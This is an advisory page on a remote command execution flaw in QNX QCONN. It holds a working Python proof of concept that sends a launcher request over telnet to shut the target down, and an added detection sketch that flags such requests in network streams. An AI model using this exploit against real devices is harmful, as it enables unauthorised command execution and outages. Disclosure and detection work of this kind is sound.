QNX QCONN Remote Command Execution Exploit

Summary

QNX QCONN suffers from a remote command execution vulnerability.

Credit:

The information has been provided by Mor!p3r.


Details

Vulnerable Systems:
 * QNX 6.5.0 >= , QCONN >= 1.4.207944

# Python 2 proof of concept.
import telnetlib
import sys

# Print usage and exit unless both the target IP and port are supplied.
if len(sys.argv) < 3:
    print ' '
    print ' -----------------------------------------------------'
    print ' + Qconn Remote Command Execution PoC (Shutdown) +'
    print ' -----------------------------------------------------'
    print ' '
    print ' + Usage: QCONNRC.py <Target IP> <Port>'
    print ' + Ex> QCONNRC.py 192.168.0.1 8000'
    print ''
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
# Select the launcher service, then request that it start /bin/shutdown -b.
attack = 'service launcher\n' + 'start/flags 8000 /bin/shutdown /bin/shutdown -b\n' + 'continue\n'
telnet = telnetlib.Telnet(host, port)
telnet.write(attack)
print '[+] Finish'
telnet.close()
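
Detection sketch (an added example, not part of the original advisory or of any QNX tooling): a stateful scanner that flags launcher start requests in reassembled client-to-server payloads sent to the qconn port. The command layout (service <name>, then start/flags <flags> <executable> <argv...>) is inferred from the PoC above and is an assumption; the class name, the service name "example" and the sample segments are constructed for illustration.

```python
# Added example (Python 3): flag qconn launcher start requests in a
# client-to-server TCP stream. Command layout is an assumption inferred
# from the PoC on this page, not taken from QNX documentation.

MAX_LINE = 4096  # drop an unterminated line that grows past this size


class QconnLauncherDetector:
    """Line-oriented, stateful scan of one client->server stream."""

    def __init__(self):
        self._buf = b""        # bytes of an incomplete trailing line
        self._service = None   # last name selected with "service <name>"
        self.alerts = []

    def feed(self, chunk):
        """Consume one TCP segment payload and record any alerts."""
        self._buf += chunk
        # Everything before the last newline is complete; keep the rest.
        *lines, self._buf = self._buf.split(b"\n")
        if len(self._buf) > MAX_LINE:
            self._buf = b""
        for raw in lines:
            alert = self._inspect(raw.strip().decode("ascii", "replace"))
            if alert:
                self.alerts.append(alert)

    def _inspect(self, line):
        tokens = line.split()
        if not tokens:
            return None
        verb = tokens[0].lower()
        if verb == "service" and len(tokens) > 1:
            self._service = tokens[1].lower()
        elif verb == "start/flags" and self._service == "launcher":
            # Assumed layout: start/flags <flags> <executable> <argv...>
            return {"flags": tokens[1] if len(tokens) > 1 else None,
                    "executable": tokens[2] if len(tokens) > 2 else None,
                    "argv": tokens[3:]}
        return None


def scan(segments):
    """Run a fresh detector over an ordered list of segment payloads."""
    det = QconnLauncherDetector()
    for seg in segments:
        det.feed(seg)
    return det.alerts


# Constructed sample: the PoC's request split across two segments, CRLF ended.
SAMPLE_SEGMENTS = [b"service laun", b"cher\r\nstart/flags 8000 /bin/shutdown "
                   b"/bin/shutdown -b\r\ncontinue\r\n"]
# Constructed negative sample: same verb, hypothetical non-launcher service.
BENIGN_SEGMENTS = [b"service example\nstart/flags 8000 /bin/ls /bin/ls\n"]
```

Feed it the payloads of each inbound connection to the qconn port in arrival order; any alert means a remote peer asked the launcher service to start a program and should be triaged together with the source address.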

Disclosure Timeline:
Published: 2012-09-12
